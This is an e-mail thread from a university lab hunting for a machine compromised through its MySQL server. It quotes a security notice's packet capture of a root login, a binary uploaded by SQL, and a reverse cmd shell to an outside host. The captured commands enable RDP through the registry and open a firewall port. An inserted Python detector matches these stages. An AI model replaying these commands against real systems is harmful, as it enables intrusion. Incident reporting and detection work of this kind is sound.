<p dir="ltr">Ok we found it, it's the Windows partition that Peter doesn't use. No idea how that happened since he told me his computer was running the Ubuntu partition at the time, but at least the mystery is solved. </p>
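<p dir="ltr">Added example, not part of this e-mail thread or of any participant's message: a Python sketch that scans an ngrep-style text capture, like the sample quoted in the security notice further down, for the stages visible there (remote root login to MySQL, <code>SELECT @@plugin_dir</code>, a PE image inside a SQL statement, a cmd.exe banner leaving the host, and the <code>fDenyTSConnections</code> registry change). The addresses, timestamps, rule names, function names and sample lines are constructed for illustration.</p>

```python
import re
from dataclasses import dataclass

# Packet header of an ngrep-style text capture:
#   T <date> <time> <src>:<port> -> <dst>:<port> [<flags>]
HEADER = re.compile(
    r"^T (?P<ts>\d{4}/\d\d/\d\d \d\d:\d\d:\d\d\.\d+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) \[[A-Z]+\]$"
)
# Mail clients wrap long headers after "->"; the rest is on the next line.
PARTIAL = re.compile(r"^T \d{4}/\d\d/\d\d \S+ \S+ ->$")

@dataclass
class Packet:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    payload: str = ""

def parse_capture(text):
    """Split a (possibly e-mail quoted) capture into packets with payload."""
    packets, pending = [], None
    for raw in text.splitlines():
        line = re.sub(r"^>\s?", "", raw).rstrip()   # drop one quote marker
        if pending:                                  # re-join a wrapped header
            line, pending = pending + " " + line, None
        if PARTIAL.match(line):
            pending = line
            continue
        m = HEADER.match(line)
        if m:
            packets.append(Packet(m["ts"], m["src"], int(m["sport"]),
                                  m["dst"], int(m["dport"])))
        elif packets and line:
            packets[-1].payload += line + "\n"
    return packets

def direction(p, host, db_port=3306):
    """Classify a packet relative to the monitored database host."""
    if p.dst == host and p.dport == db_port:
        return "to_db"        # client traffic to MySQL
    if p.src == host and p.sport != db_port:
        return "shell_out"    # host talking out on a non-MySQL port
    if p.dst == host:
        return "shell_in"     # remote side of that non-MySQL session
    return "other"

# (rule name, direction it applies to, pattern). Names are made up here.
RULES = [
    # A login attempt as root; it does not prove the login succeeded.
    ("remote-root-login", "to_db", re.compile(r"root.*mysql_native_password")),
    ("plugin-dir-recon", "to_db", re.compile(r"SELECT\s+@@plugin_dir", re.I)),
    ("pe-in-sql", "to_db", re.compile(
        r"SELECT\s+'MZ.{0,200}This program cannot be run in DOS mode")),
    ("cmd-banner-outbound", "shell_out",
     re.compile(r"Microsoft Windows \[Version [\d.]+\]")),
    # Matched only on inbound commands so the shell's echo is not counted twice.
    ("rdp-enabled", "shell_in",
     re.compile(r"fDenyTSConnections\b.*?/d\s+(0x)?0+\b", re.I)),
    ("firewall-change", "shell_in",
     re.compile(r"netsh\s+advfirewall\s+firewall\s+add", re.I)),
]

def detect(text, host):
    """Return [(timestamp, rule)] in capture order for the monitored host."""
    alerts = []
    for p in parse_capture(text):
        d = direction(p, host)
        flat = " ".join(p.payload.split())   # undo line wrapping in payloads
        alerts += [(p.ts, name) for name, want, rx in RULES
                   if d == want and rx.search(flat)]
    return alerts

def udf_shell_chain(alerts):
    """True when recon, PE upload and shell banner appear in that order."""
    stages = ["plugin-dir-recon", "pe-in-sql", "cmd-banner-outbound"]
    i = 0
    for _, rule in alerts:
        if i < len(stages) and rule == stages[i]:
            i += 1
    return i == len(stages)

# Constructed sample (documentation addresses, shortened payloads).
SAMPLE = r"""> T 2024/01/01 00:00:01.000000 198.51.100.7:3549 ->
> 192.0.2.10:3306 [AP]
> V..........@......root......Ndy....mysql.mysql_native_password.
>
> T 2024/01/01 00:00:02.000000 198.51.100.7:3549 -> 192.0.2.10:3306 [AP]
> .....SELECT @@plugin_dir;
>
> T 2024/01/01 00:00:03.000000 198.51.100.7:3549 -> 192.0.2.10:3306 [A]
> .l...SELECT
> 'MZ......!This program cannot be run in DOS
> mode....
>
> T 2024/01/01 00:00:04.000000 192.0.2.10:20138 -> 198.51.100.7:4000 [AP]
> Microsoft Windows [Version 6.1.7601]
>
> T 2024/01/01 00:00:05.000000 198.51.100.7:4000 -> 192.0.2.10:20138 [AP]
> reg.exe ADD
> "HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
> Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
>
> T 2024/01/01 00:00:06.000000 192.0.2.10:20138 -> 198.51.100.7:4000 [AP]
> reg.exe ADD ... /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
"""

if __name__ == "__main__":
    found = detect(SAMPLE, "192.0.2.10")
    for ts, rule in found:
        print(ts, rule)
    print("UDF-to-shell chain:", udf_shell_chain(found))
```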
<div class="gmail_extra"><br><div class="gmail_quote">On 20 Jan 2017 15:16, "Adam Ibrahim" <<a href="mailto:adam.ibrahim.fr@gmail.com">adam.ibrahim.fr@gmail.com</a>> wrote:<br type="attribution"><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><p dir="ltr">We found it ! IT'S PETER I'M WITH HIM RIGHT NOW I'M GOING TO PRETEND I DON'T KNOW ANY...</p>
<div class="gmail_extra"><br><div class="gmail_quote">On 20 Jan 2017 15:06, "Matthew Turk" <<a href="mailto:mturk@cs.ucsb.edu" target="_blank">mturk@cs.ucsb.edu</a>> wrote:<br type="attribution"><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><div lang="EN-US" link="blue" vlink="purple"><div class="m_4984286264770429436m_1796219740597547551WordSection1"><p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri",sans-serif;color:#1f497d">Thanks for checking. Scott said that the MAC address is 00:21:9b:05:e7:48 and it is a Dell computer. It seems to be currently off but was on Wednesday. It should also be a wired connection – unless we have a router in the trailer (do we?).<u></u><u></u></span></p><p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri",sans-serif;color:#1f497d"><u></u> <u></u></span></p><p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri",sans-serif;color:#1f497d"> Matthew<u></u><u></u></span></p><p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri",sans-serif;color:#1f497d"><u></u> <u></u></span></p><p class="MsoNormal"><b><span style="font-size:11.0pt;font-family:"Calibri",sans-serif">From:</span></b><span style="font-size:11.0pt;font-family:"Calibri",sans-serif"> Adam Ibrahim [mailto:<a href="mailto:adam.ibrahim.fr@gmail.com" target="_blank">adam.ibrahim.fr@gmail.<wbr>com</a>] <br><b>Sent:</b> Friday, January 20, 2017 3:00 PM<br><b>To:</b> Matthew Turk <<a href="mailto:mturk@cs.ucsb.edu" target="_blank">mturk@cs.ucsb.edu</a>><br><b>Cc:</b> <a href="mailto:ilab-users@lists.cs.ucsb.edu" target="_blank">ilab-users@lists.cs.ucsb.edu</a><br><b>Subject:</b> Re: [4eyes] [COE #74336] [UCSB-OIT #942765] <a href="http://128.111.28.118" target="_blank">128.111.28.118</a>: was compromised via its MySQL server<u></u><u></u></span></p><p class="MsoNormal"><u></u> <u></u></p><p>Hey Matthew, we checked all the machines that were on when it 
happened and couldn't find the culprit. There are a couple machines that have been turned off for a week (the ones Brandon and I tried salvaging) but they won't boot as there's no os and one's HDD looks dead. Do they know the mac address of the machine we're looking for ? None had that IP but IP can change and none was blocked from the network. If it weren't for the hp printer drivers I'd suspect someone out of the lab connected to our wifi. <br>Adam<u></u><u></u></p><div><p class="MsoNormal"><u></u> <u></u></p><div><p class="MsoNormal">On 20 Jan 2017 14:51, "Matthew Turk" <<a href="mailto:mturk@cs.ucsb.edu" target="_blank">mturk@cs.ucsb.edu</a>> wrote:<u></u><u></u></p><blockquote style="border:none;border-left:solid #cccccc 1.0pt;padding:0in 0in 0in 6.0pt;margin-left:4.8pt;margin-right:0in"><p class="MsoNormal">Update on this: Scott says the machine is in the trailer, and it's a Windows machine. So I need someone to please check the IP address of every Windows machine in the trailer - looking for 128.111.28.118. I expect there are orphaned machines that no one has checked.<br><br>Is anyone there this afternoon to do this ASAP?<br><br>Thanks,<br> Matthew<u></u><u></u></p><div><p class="MsoNormal"><br>-----Original Message-----<br>From: Matthew Turk [mailto:<a href="mailto:mturk21@gmail.com" target="_blank">mturk21@gmail.com</a>] On Behalf Of Matthew Turk<u></u><u></u></p></div><div><p class="MsoNormal">Sent: Thursday, January 19, 2017 5:59 PM<br>To: <a href="mailto:ilab-users@lists.cs.ucsb.edu" target="_blank">ilab-users@lists.cs.ucsb.edu</a><br>Subject: RE: [COE #74336] [UCSB-OIT #942765] <a href="http://128.111.28.118" target="_blank">128.111.28.118</a>: was compromised via its MySQL server<br><br>No one has claimed this machine yet. Please check yours and let me know. 
(There are usual suspects here, but I won't name names!)<br><br> Matthew<br><br>-----Original Message-----<br>From: Matthew Turk [mailto:<a href="mailto:mturk21@gmail.com" target="_blank">mturk21@gmail.com</a>] On Behalf Of Matthew Turk<br>Sent: Wednesday, January 18, 2017 9:20 PM<br>To: <a href="mailto:ilab-users@lists.cs.ucsb.edu" target="_blank">ilab-users@lists.cs.ucsb.edu</a><br>Subject: FW: [COE #74336] [UCSB-OIT #942765] <a href="http://128.111.28.118" target="_blank">128.111.28.118</a>: was compromised via its MySQL server<br><br>Whose machine is 128.111.28.118? Please check - if it's yours, please let me know and see the info below.<br><br>Thanks,<br> Matthew<br><br>-----Original Message-----<br>From: Tier II Support Issues via CoE Support [mailto:<a href="mailto:help@engineering.ucsb.edu" target="_blank">help@engineering.ucsb.<wbr>edu</a>]<br>Sent: Wednesday, January 18, 2017 10:41 AM<br>To: <a href="mailto:holl@cs.ucsb.edu" target="_blank">holl@cs.ucsb.edu</a>; <a href="mailto:mturk@cs.ucsb.edu" target="_blank">mturk@cs.ucsb.edu</a><br>Subject: [COE #74336] [UCSB-OIT #942765] <a href="http://128.111.28.118" target="_blank">128.111.28.118</a>: was compromised via its MySQL server<br><br>The following reply has been made regarding CoE Support ticket #74336:<br><br>Hi Matt and Tobias,<br><br>OIT has sent us this warning about ilab-118 machine that is compromised and needs to be looked into. Please read the information below.<br><br>On Wed Jan 18 10:24:26 2017, <a href="mailto:security@ucsb.edu" target="_blank">security@ucsb.edu</a> wrote:<br>> Greetings,<br>><br>> 128.111.28.118 has been compromised and has been blocked. The host was<br>> compromised via its MySQL server.<br>><br>> Before correcting any problems, please consider whether any sensitive<br>> personal information is stored on this device. 
If this device contains<br>> personal information and if it appears to have been compromised,<br>> please contact the UCSB Chief Information Security Officer, at<br>> <a href="mailto:CISO@oist.ucsb.edu" target="_blank">CISO@oist.ucsb.edu</a> or 893-5005 immediately.<br>><br>> To view the UCSB procedures when a device storing personal information<br>> has been compromised, please visit:<br>> <a href="http://www.ets.ucsb.edu/security/sb-1386-and-ab-1298-guideline" target="_blank">http://www.ets.ucsb.edu/securi<wbr>ty/sb-1386-and-ab-1298-guideli<wbr>ne</a><br>><br>> Please investigate and advise. Here is a sample of traffic from the<br>> trojan:<br>><br>> ----------sample----------<br>> T 2017/01/18 02:45:47.091988 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:45:47.497391 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [AP]<br>> J...<br>> 5.5.11..+..EV``AdUY...!.......<wbr>........B~tMc*DXpHVW.mysql_nat<wbr>ive_password.<br>><br>> T 2017/01/18 02:45:47.684113 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [AP]<br>><br><a href="mailto:V..........@........................root......Ndy....3......;.mysql.mysql_native_password" target="_blank">V..........@..................<wbr>......root......Ndy....3......<wbr>;.mysql.mysql_native_password</a>.<br>><br>> T 2017/01/18 02:45:47.684972 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [AP]<br>> ...........<br>><br>> T 2017/01/18 02:45:47.878832 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a 
href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [AP]<br>> .....SELECT @@max_allowed_packet;<br>><br>> T 2017/01/18 02:45:47.899132 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [AP]<br>><br>.....*....def....@@max_allowed<wbr>_packet..?....................<wbr>.....1048576.........<br>><br>> T 2017/01/18 02:45:48.088029 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [AP]<br>> .....SHOW VARIABLES LIKE 'VERS%';<br>><br>> T 2017/01/18 02:45:48.287569 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:45:48.331489 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [AP]<br>><br><a href="mailto:.....T....def.information_schema.VARIABLES.VARIABLES.Variable_name.VARIABLE_NAME...@.........M....def.information_schema.VARIABLES.VARIABLES.Value.VARIABLE_VALUE....................%22......version.5.5.11-" target="_blank">.....T....def.information_sche<wbr>ma.VARIABLES.VARIABLES.Variabl<wbr>e_name.VARIABLE_NAME...@......<wbr>...M....def.information_<wbr>schema.VARIABLES.VARIABLES.<wbr>Value.VARIABLE_VALUE..........<wbr>.........."......version.5.5.<wbr>11-</a><br>> ....version_comment.MySQL Community Server<br>> (GPL).....version_compile_mach<wbr>ine.x86.....version_compile_<wbr>os.Win64.......".<br>><br>> T 2017/01/18 02:45:48.682703 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:45:50.427705 <a 
href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [AP]<br>><br>> ....USE MYSQL<br>><br>> T 2017/01/18 02:45:50.428403 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [AP]<br>> ...........<br>><br>> T 2017/01/18 02:45:50.613848 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [AP]<br>> .....SELECT @@version_compile_os;<br>><br>> T 2017/01/18 02:45:50.614481 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [AP]<br>><br>.....*....def....@@version_com<wbr>pile_os.......................<wbr>.....Win64.........<br>><br>> T 2017/01/18 02:45:50.800022 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [AP]<br>> .....SELECT @@plugin_dir;<br>><br>> T 2017/01/18 02:45:50.800759 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [AP]<br>> ....."....def....@@plugin_dir.<wbr>...2..................3...2C:\<wbr>Program<br>> Files\MySQL\MySQL Server 5.5\lib/plugin.........<br>><br>> T 2017/01/18 02:45:50.990204 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [A]<br>> .l...SELECT<br>><br>
> T 2017/01/18 02:45:54.767136 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:45:55.049876 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> Microsoft Windows [Version 6.1.7601]<br>><br>> T 2017/01/18 02:45:55.448211 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:45:55.448772 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> .<br>> Copyright (c) 2009 Microsoft Corporation.
All rights reserved..<br>> .<br>> C:\ProgramData\MySQL\MySQL Server 5.5\data><br>><br>> T 2017/01/18 02:45:55.776319 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:46:19.130812 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [AP]<br>> ipconfig<br>><br>><br>> T 2017/01/18 02:46:19.131472 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> ipconfig<br>><br>><br>> T 2017/01/18 02:46:19.304083 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [A]<br>> .<br>> Windows IP Configuration.<br>> .<br>> .<br>> Ethernet adapter Local Area Connection:.<br>> .<br>> Connection-specific DNS Suffix . : <a href="http://cs.ucsb.edu" target="_blank">cs.ucsb.edu</a>.<br>> IPv4 Address. . . . . . . . . . . : 128.111.28.118.<br>> Subnet Mask . . . . . . . . . . . : 255.255.255.192.<br>> Default Gateway . . . . . . . . . : 128.111.28.65.<br>> .<br>> Ethernet adapter Local Area Connection 2:.<br>> .<br>> Connection-specific DNS Suffix . : .<br>> IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4::1.<br>> Link-local IPv6 Address . . . . . : fe80::b57a:afce:a5c3:9380%15.<br>> IPv4 Address. . . . . . . . . . . : 10.37.130.2.<br>> Subnet Mask . . . . . . . . . . . : 255.255.255.0.<br>> Default Gateway . . . . . . . . . : .<br>> .<br>> Ethernet adapter Local Area Connection 2:.<br>> .<br>> Connection-specific DNS Suffix . : .<br>> IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:1::1.<br>> Link-local IPv6 Address . . . . . : fe80::c9a9:464b:1f35:e7b3%17.<br>> IPv4 Address. . . . . . . . . . . 
: 10.37.131.2.<br>> Subnet Mask . . . . . . . . . . . : 255.255.255.0.<br>> Default Gateway . . . . . . . . . : .<br>> .<br>> Tunnel adapter <a href="http://isatap.cs.ucsb.edu" target="_blank">isatap.cs.ucsb.edu</a>:.<br>> .<br>> Media State . . . . . . . . . . . : Media disconnected.<br>> Connection-specific DNS Suffix . : <a href="http://cs.ucsb.edu" target="_blank">cs.ucsb.edu</a>.<br>> .<br>> Tunnel adapter isatap.{49BB9C41-C060-433B-BF9<wbr>1-9F104E841F11}:.<br>> .<br>> Media State . . . . . . . . . . . : Media disconnected.<br>> Connection-specific DNS Suffix . : .<br>> .<br>> Tunnel adapter Local Area Connection* 11:.<br>> .<br>> Media State . . . . . . . . . . . : Media disconnected.<br>> Connection-spec<br>><br>> T 2017/01/18 02:46:19.304089 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> ific DNS Suffix . : .<br>><br>><br>> T 2017/01/18 02:46:19.500202 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:46:19.500764 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> .<br>> Tunnel adapter isatap.{EB59D303-0C84-4EF4-842<wbr>B-01A57D775715}:.<br>> .<br>> Media State . . . . . . . . . . . : Media disconnected.<br>> Connection-specific DNS Suffix . 
: .<br>> .<br>> C:\ProgramData\MySQL\MySQL Server 5.5\data><br>><br>> T 2017/01/18 02:46:19.696722 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:46:44.733187 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [AP]<br>> reg.exe ADD<br>> "HKEY_LOCAL_Machine\System\Cur<wbr>rentControlSet\Control\Termina<wbr>l<br>> Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f<br>><br>><br>> T 2017/01/18 02:46:44.733944 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> reg.exe ADD<br>> "HKEY_LOCAL_Machine\System\Cur<wbr>rentControlSet\Control\Termina<wbr>l<br>> Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f<br>><br>><br>> T 2017/01/18 02:46:45.104427 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:46:45.104905 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> The operation completed successfully...<br>> .<br>> C:\ProgramData\MySQL\MySQL Server 5.5\data><br>><br>> T 2017/01/18 02:46:45.432785 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:46:56.087756 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [AP]<br>> netsh advfirewall firewall add 
rule name = "Windows Service Host"<br>> dir=in action=allow protocol=TCP localport=3389<br>><br>><br>> T 2017/01/18 02:46:56.088487 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> netsh advfirewall firewall add rule name = "Windows Service Host"<br>> dir=in action=allow protocol=TCP localport=3389<br>><br>><br>> T 2017/01/18 02:46:56.596211 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:46:59.117911 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> Ok..<br>> .<br>><br>> T 2017/01/18 02:46:59.432046 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:46:59.432624 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> .<br>> .<br>> C:\ProgramData\MySQL\MySQL Server 5.5\data><br>><br>> T 2017/01/18 02:46:59.761298 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:47:16.188439 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [AP]<br>> net start<br>><br>><br>> T 2017/01/18 02:47:16.189037 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" 
target="_blank">188.132.176.26:4000</a> [AP]<br>> net start<br>><br>><br>> T 2017/01/18 02:47:16.385997 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:47:16.427758 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> These Windows services are started:.<br>><br>><br>> T 2017/01/18 02:47:16.428404 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [A]<br>> .<br>> Adobe Acrobat Update Service.<br>> AMD External Events Utility.<br>> Apple Mobile Device.<br>> Application Experience.<br>> Application Information.<br>> Background Intelligent Transfer Service.<br>> Base Filtering Engine.<br>> Bonjour Service.<br>> Certificate Propagation.<br>> COM+ Event System.<br>> Computer Browser.<br>> Credential Manager.<br>> Cryptographic Services.<br>> DCOM Server Process Launcher.<br>> Desktop Window Manager Session Manager.<br>> DHCP Client.<br>> Diagnostic Policy Service.<br>> Diagnostic Service Host.<br>> Diagnostics Tracking Service.<br>> Distributed Link Tracking Client.<br>> DNS Client.<br>> Function Discovery Provider Host.<br>> Function Discovery Resource Publication.<br>> Group Policy Client.<br>> Human Interface Device Access.<br>> IKE and AuthIP IPsec Keying Modules.<br>> IP Helper.<br>> iPod Service.<br>> IPsec Policy Agent.<br>> LMIGuardianSvc.<br>> LogMeIn.<br>> LogMeIn Maintenance Service.<br>> Microsoft Antimalware Service.<br>> Microsoft Network Inspection.<br>> Microsoft Office Click-to-Run Service.<br>> MT7 Registry Service.<br>> MT7 Serial Search Service.<br>> MySQL55.<br>> Network Connections.<br>> Network List Service.<br>> Network Location Awareness.<br>> Network Store 
Interface Service.<br>> Office Software Protection Platform.<br>> Offline Files.<br>> Parallels Networking Service.<br>> Parallels Virtualization Service.<br>> Plug and Play.<br>> Pml Driver HPZ12.<br>> PnP-X IP Bus Enumerator.<br>> Portable Device Enumerator Service.<br>> Power.<br>> Print Spooler.<br>> Program Compati<br>><br>> T 2017/01/18 02:47:16.428408 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> bility Assistant Service<br>><br>> T 2017/01/18 02:47:16.625665 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:47:16.626533 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> .<br>> Quality Windows Audio Video Experience.<br>> Remote Access Connection Manager.<br>> Remote Desktop Configuration.<br>> Remote Desktop Services.<br>> Remote Desktop Services UserMode Port Redirector.<br>> Remote Procedure Call (RPC).<br>> Routing and Remote Access.<br>> RPC Endpoint Mapper.<br>> Secondary Logon.<br>> Secure Socket Tunneling Protocol Service.<br>> Security Accounts Manager.<br>> Security Center.<br>> Server.<br>> Shell Hardware Detection.<br>> Skype C2C Service.<br>> SQL Server (SQLEXPRESS).<br>> SQL Server VSS Writer.<br>> SSDP Discovery.<br>> Superfetch.<br>> System Event Notification Service.<br>> Tablet PC Input Service.<br>> TabletServicePen.<br>> Task Scheduler.<br>> TCP/IP NetBIOS Helper.<br>> TeamViewer 11.<br>> Telephony.<br>> Themes.<br>> UPnP Device Host.<br>> User Profile Service.<br>> Wacom Consumer Touch Service.<br>> Windows App Certification Kit Fast User Switching Utility Service.<br>> Windows Audio.<br>> Windows Audio Endpoint Builder.<br>> Windows 
Driver Foundation - User-mode Driver Framework.<br>> Windows Event Log.<br>> Windows Firewall.<br>> Windows Font Cache Service.<br>> Windows Image Acquisition (WIA).<br>> Windows Management Instrumentation.<br>> Windows Media Player Network Sharing Service.<br>> Windows Presentation Foundation Font Cache 3.0.0.0.<br>> Windows Search.<br>> Windows Update.<br>> WinHTTP Web Proxy Auto-Discovery Service.<br>> Workstation.<br>> .<br>> The command completed successfully..<br>> .<br>> .<br>> C:\ProgramData\MySQL\MySQL Server 5.5\data><br>><br>> ----------sample----------<br>> --<br>> E. Todd Atkins<br>> Enterprise Technology Services<br>> University of California, Santa Barbara <a href="http://www.security.ucsb.edu/" target="_blank">http://www.security.ucsb.edu/</a><br>><br>> ******************************<wbr>******************************<wbr>**********<br>> The NOC's list of network contacts is used to determine who should<br>> receive email such as this. Please direct any requests for changes to<br>> this list of network contacts to <a href="mailto:noc@ucsb.edu" target="_blank">noc@ucsb.edu</a>.<br>> 